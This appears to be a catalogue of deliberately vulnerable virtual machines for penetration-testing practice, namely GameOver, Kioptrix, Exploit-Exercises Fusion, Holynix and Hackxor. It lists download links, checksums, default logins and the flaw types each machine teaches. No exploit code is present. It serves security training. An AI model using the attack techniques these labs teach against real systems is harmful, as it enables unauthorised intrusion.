: Game Over [: Web Pentest Learning Platform : VM image/iso : Jovin Lobo : Murtuja Bharmal : http://sourceforge.net/projects/null-gameover/files : username:root / password:gameover]
Project GameOver was started with the objective of training and educating newbies about the basics of web security and educate them about the common web attacks and help them understand how they work. It is a collection of various vulnerable web applications, designed for the purpose of learning web penetration testing. GameOver has been broken down into two sections.
consists of special web applications that are designed especially to teach the basics of Web Security. This section will cover:
is a collection of deliberately insecure Web applications. This section provides a legal platform to test your skills and to try and exploit the vulnerabilities and sharpen your skills before you pentest live sites. We would advise newbies to try and exploit these web applications. These applications provide real life environments and will boost their confidence.
Source:
MD5: 0AF4532DB192DE917CA116A0EFEF3565
SHA1: 0AE3465B3B33C8E4BC62F7AF5216983DC57041FD
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Kioptrix: Level 1.2 (#3)
Date released: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Size: 442 MB
Download: https://download.vulnhub.com/kioptrix/KVM3.rar
Description:
It’s been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things you know. After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.
As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being in the realm of the beginner I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to one’s own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to
Under Windows, you would edit to look something like this:
Under Linux that would be
There’s a web application involved, so to have everything nice and properly displayed you really need to do this. Hope you enjoy Kioptrix VM Level 1.2 challenge.
452 Megs
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Have fun
Source:
MD5: D324FFADD8E3EFC1F96447EEC51901F2
SHA1: 121348AA8DD5F83640145D4F8E042C8DE0A78F3F
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Exploit-Exercises: Fusion (v2)
Date released: 8 Apr 2012
Author: Exploit-Exercises.com
Series: Exploit-Exercises
Size: 794 MB
Download: https://download.vulnhub.com/exploitexercises/exploit-exercises-fusion-2.iso
Description:
Fusion is the next step from the protostar setup, and covers more advanced styles of exploitation, and covers a variety of anti-exploitation mechanisms such as:
+ Address Space Layout Randomisation
+ Position Independent Executables
+ Non-executable Memory
+ Source Code Fortification (_DFORTIFY_SOURCE=)
+ Stack Smashing Protection (ProPolice / SSP)
In addition to the above, there are a variety of other challenges and things to explore, such as:
+ Cryptographic issues
+ Timing attacks
+ Variety of network protocols (such as Protocol Buffers and Sun RPC)
+
At the end of Fusion, the participant will have a thorough understanding of exploit prevention strategies, associated weaknesses, various cryptographic weaknesses, numerous heap implementations. Have a look at the levels available on the side bar, and pick which ones interest you the most. If in doubt, begin at the start. You can log into the virtual machine with the username of “fusion” (without quotes), and password “godmode” (again, without quotes). To get root for debugging purposes, do “sudo -s” with the password of “godmode”.
Source:
From v1 (Alpha?) to v2 - Moved from OVA to bootable CD format. Reduces issues with importing OVA files.
MD5: 62E504AD9A19FE1974568904673DB9C9
SHA1: B89ABCDDA58EDF68465F36B4F7A94FE34F0050F1
Format: Disk Image (.ISO)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Holynix: v2
Date released: 8 Dec 2010
Author: Holynix
Series: Holynix
Size: 307 MB
Download: https://download.vulnhub.com/holynix/holynix-v2.tar.bz2
Description:
Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing. If you’re having trouble, or there are any problems, it can be discussed here.
Source:
Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing. The object of the challenge v1 is just to root the box. Register on the forums to receive an email update when a new challenge is released. Holynix v2 is set with static ip and requires some network configuration in order to run.
Homepage: http://pynstrom.com/
Project Page: http://pynstrom.com/holynix.php
Forums: http://pynstrom.com/forum/
Bugs can be reported using sourceforge’s bug tracker located at http://sourceforge.net/projects/holynix/support or reported to me directly at
Source: holynix-v2.tar.bz2/README.txt
Source:
MD5: 0EE76D70342EED68F298D10AB483A9E0
SHA1: DEB7EEAB03C3381A14FFFBE97011F1451DC36E79
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Disabled
IP address: 192.168.1.88

Holynix: v1
Date released: 27 Nov 2010
Author: Holynix
Series: Holynix
Size: 239 MB
Download: https://download.vulnhub.com/holynix/holynix-v1.tar.bz2
Description:
Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing. If you’re having trouble, or there are any problems, it can be discussed here.
Source:
Similar to the de-ice and pWnOS pentest cds, Holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example. The object of the challenge is to gain root level privileges and access to personal client information.
Homepage: http://pynstrom.com/
Project Page: http://pynstrom.com/holynix.php
Forums: http://pynstrom.com/forum/
Bugs or can be reported using sourceforge’s bug tracker located at http://sourceforge.net/projects/holynix/support or reported to me directly at pynstrom AT pynstrom DOT com
Source: holynix-v1.tar.bz2/README.txt
Source:
Source:
Beta MD5: D19306C6C2305005C72A7811D2B72B51
Beta SHA1: 0C5B7D37FECD39C52BC2C8C2EE66A617BB576A90
Final MD5: EBB8EF2544559D72A052687497F78341
Final SHA1: 967F3DB6D97CCC615EB5758AC75387D46C3D1199
MD5: EBB8EF2544559D72A052687497F78341
SHA1: 967F3DB6D97CCC615EB5758AC75387D46C3D1199
Format: Virtual Machine (Virtualbox - VDI)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Kioptrix: Level 1.1 (#2)
Date released: 11 Feb 2011
Author: Kioptrix
Series: Kioptrix
Size: 404 MB
Download: https://download.vulnhub.com/kioptrix/archive/Kioptrix_Level_2-original.rar
Description:
The Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
Source:
Source:
2012/Feb/09: Re-release
2011/Feb/11: Original Release
MD5: 1CCC14189E530F9231ACF62E6FC8AF2D
SHA1: 8E767C68D3884DB13F84A607E5366434E3FA0858
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Hackxor: 1
Date released: 14 Oct 2012
Author: Albinowax
Series: Hackxor
Size: 587 MB
Download: https://download.vulnhub.com/hackxor/hackxor1.7z
Description:
Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism & difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc.
Features:
If you can’t edit the hosts file for some reason, you could use the ‘Override hostname resolution’ option in Burp proxy.
You play a professional blackhat hacker hired to track down another hacker by any means possible. Start by checking your email on wraithmail, and see how far down the rabbit hole you can get. The key websites in this game are http://wraithmail:8080 http://cloaknet:8080 http://gghb:8080 and http://hub71:8080 so if you don’t feel like tracking down your target you may hack them in any order. Each website will be properly introduced through the plot.
Source:
MD5: F276B7A7E421182473D86E9C8204A484
SHA1: 136DD44851CBA5ECBC25A2104DE9D31FF633959B
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign